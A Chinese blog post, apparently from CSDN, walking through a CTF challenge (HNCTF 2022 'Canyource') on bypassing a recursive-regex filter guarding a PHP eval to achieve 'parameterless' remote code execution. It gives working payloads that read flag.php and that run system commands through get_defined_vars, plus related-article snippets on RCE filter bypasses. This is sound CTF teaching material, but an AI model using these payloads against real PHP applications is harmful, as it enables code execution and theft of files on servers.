无参数RCE绕过

最新推荐文章于 2024-09-08 16:25:03 发布
最新推荐文章于 2024-09-08 16:25:03 发布
阅读量501 收藏 5
点赞数 18
文章标签: linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76849272/article/details/140349153
版权

特征

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);}

        使用该正则表达式时,每个函数调用都会被删除,只剩下一个分号 ;,而最终结果强等于;时,payload才能进行下一步。简而言之,无参数rce就是不使用参数,而只使用一个个函数最终达到目的。

例题:[HNCTF 2022 WEEK2]Canyource

<?php
highlight_file(__FILE__);
if(isset($_GET['code'])&&!preg_match('/url|show|high|na|info|dec|oct|pi|log|data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['code'])){
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);}
else
    die('nonono');}
else
    echo('please input code');
?> 
if(isset($_GET['code'])&&!preg_match('/url|show|high|na|info|dec|oct|pi|log|data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['code'])

这里限制了phpinfo()、highlight_file、show_source函数使用不了。

方法一:scandir()

1.这里我们首先通过print_r(loccaleconv());可以看到    [decimal_point] => .

 localeconv() – 函数返回一个包含本地数字及货币格式信息的数组 第一个是.

2. 利用current()将这个‘.’读取出来(current()-读取数组的第一个元素);‘.'代表着当前目录,相当于Linux中的ls命令

3.利用scandir()//(scandir()-扫描目录),scandir(.)将会返回当前目录的文件和子目录

能够得到flag就藏在flag.php文件中

4.flag.php的位置在后面,利用array_reverse()将数组内容倒转,从倒数第二的位置变成正数第二 

5.接下来通过next(),将内部指针指向数组中的下一个元素,这样就能够指定flag.php文件了 6.最后用readfile()返回文件内容,得到flag了zuzu 最终payload:?code=readfile(next(array_reverse(scandir(pos(localeconv())))));//                              pos()和current()功能一样

方法二:get_defined_vars()

1.首先我们去判断是否有回显

它能够回显全局变量,顺序为$_GET、$_POST、$_COOKIE、$_FILES

2.假如说原本只有一个参数,那么可以多加一个参数,后面去写入恶意语句,

payload:?code=eval(end(pos(get_defined_vars())));&a=system(ls);

 另还有多种解法,大家积极探索

猫猫爱睡懒觉
关注
  • 18
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【网络安全RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 1209
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
RCE远程命令/代码执行漏洞及绕过
G3et的博客
01-01 781
(1)RCE主要是执行了危险的函数(3)常见的绕过:空格过滤、命令分隔符、编码绕过、Hex编码绕过、Oct编码绕过、变量绕过、反斜杠绕过、偶读拼接绕过关键字过滤等 (4)熟悉掌握php中远程命令/代码执行的相关函数以及绕过和原理参考文档:远程命令/代码执行漏洞(RCE)总结RCE远程命令执行绕过初学RCE(远程命令/代码执行漏洞)
参数RCE
m0_62422842的博客
05-11 1553
正则的递归 正则表达式中有一种递归的用法,今天才知道。但是这种递归用法并不是所有语言都支持。它适用于PHP和java等语言。 以下列出几个简单的递归 (?R)? (?0)? \g<0>? 加号 , + 星号 * 问号 ? 一般来说问号也是递归的一种 一般用到最多就是?R。 括号里不能有参数,而有些题中就就会用这种递归的正则来过滤恶意函数,所以我们就用无参的函数像上图中套娃一样注入命令。 无参数RCE 一般情况下的命令执行都是由参数的,比如system函数,eval函数 ...
参数读文件和RCE总结
kuzemax的博客
07-18 893
什么是无参数?顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;
[HNCTF 2022 WEEK2]Canyource
m0_70819573的博客
04-08 635
也就是说,题目要求payload格式为()的嵌套,因为他会递归匹配,判断[...]()替换为空后的结果是否等于;2.这道题的过滤并不严格,导致了payload的多样性,在解题之前,需要了解以下函数。3.在做题之前,再讲讲题目中的正则表达式。1.打开环境,发现就是无参rce的题型。
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3543
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
week2day2
02-18
week2day2
参数rce
qi_SJQ_的博客
08-10 247
getcwd():返回当前目录的绝对路径------返回路径 scandir() :列出指定路径中的文件和目录,返回的是数组!-----利用路径(目录) print_r() :以易于理解的格式打印变量-----输出 怎么构造? localeconv() :返回一包含本地数字及货币格式信息的数组,而数组第一项就是".",因此要再用一个函数取出这个点。可以current(localeconv())返回“.”。 故:var_dump(scandir(current(localeconv())));----遍历当
初探无参数RCE
weixin_46330722的博客
12-07 2794
概念 所谓无参数RCE,就是通过没有参数的函数达到命令执行的目的。这类题目的关键代码一般长这样,后面都用这串代码当题目测试 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) { eval($_GET['exp']); } ?> 简单解释一下这串代码。这串代码就是检查了我们通过GET方式传入的exp参数的值,如果传进去的值是传进去的值是一个字符串接一个(),那么这个字符串就会被替换为空
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2190
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
参数函数RCE+[GXYCTF2019]禁止套娃 1
bazzza的博客
12-27 919
目录无参数RCE常用函数数组操作array_fliparray_randarray_reversecurrent文件file_get_contents()readfile()highlight_file()[别名:show_source()]scandir()direname()getcwd()chdir($directory)读取环境变量get_defined_vars()getenvlocaleconv()phpversion()会话session_idsession_start其它[GXYCTF201
[HNCTF 2022] web 刷题记录
rev1ve的博客
09-02 1177
简单分析一下,fsockopen能够使用socket与服务器进行tcp连接,并传输数据,host、port和数据都能定义,存在SSRF。这里应该是从index.php传参,ssrf然后访问到flag.php。F12查看,修改一下maxlength的值为11位。根据提示,传一个我们想要的,那就传flag咯。发现要求我们输入手机号,可是只能输10位。然后是修改cookie为admin,添加。然后随便输入11位,即可得到flag。然后让我们选择要哪个,这里发现。,然后ls看一下目录。
2022HNCTF-web
bossDDYY的博客
10-30 3303
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 题目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 题目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
HNCTF——web方向部分题解
m0_60715541的博客
11-01 1601
这是这次分享的题解的清单,主要是web的,等我啥时候有时间更新一波杂项的题解。
掌握 Linux 命令的艺术:深入解析与实用指南
hacker__的博客
09-06 1363
Linux操作系统是和windows操作系统是并列的关系。只不过只是两个操作系统的特性各有不同而已。
Linux 进程控制
最新发布
2302_77289177的博客
09-08 1102
Linux 进程控制
Linux> 基础IO
prodigy623的博客
09-06 981
详解Linux基础IO:文件系统调用接口与C库文件函数的关系、重定向、数据缓冲区、文件系统、动静态库
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值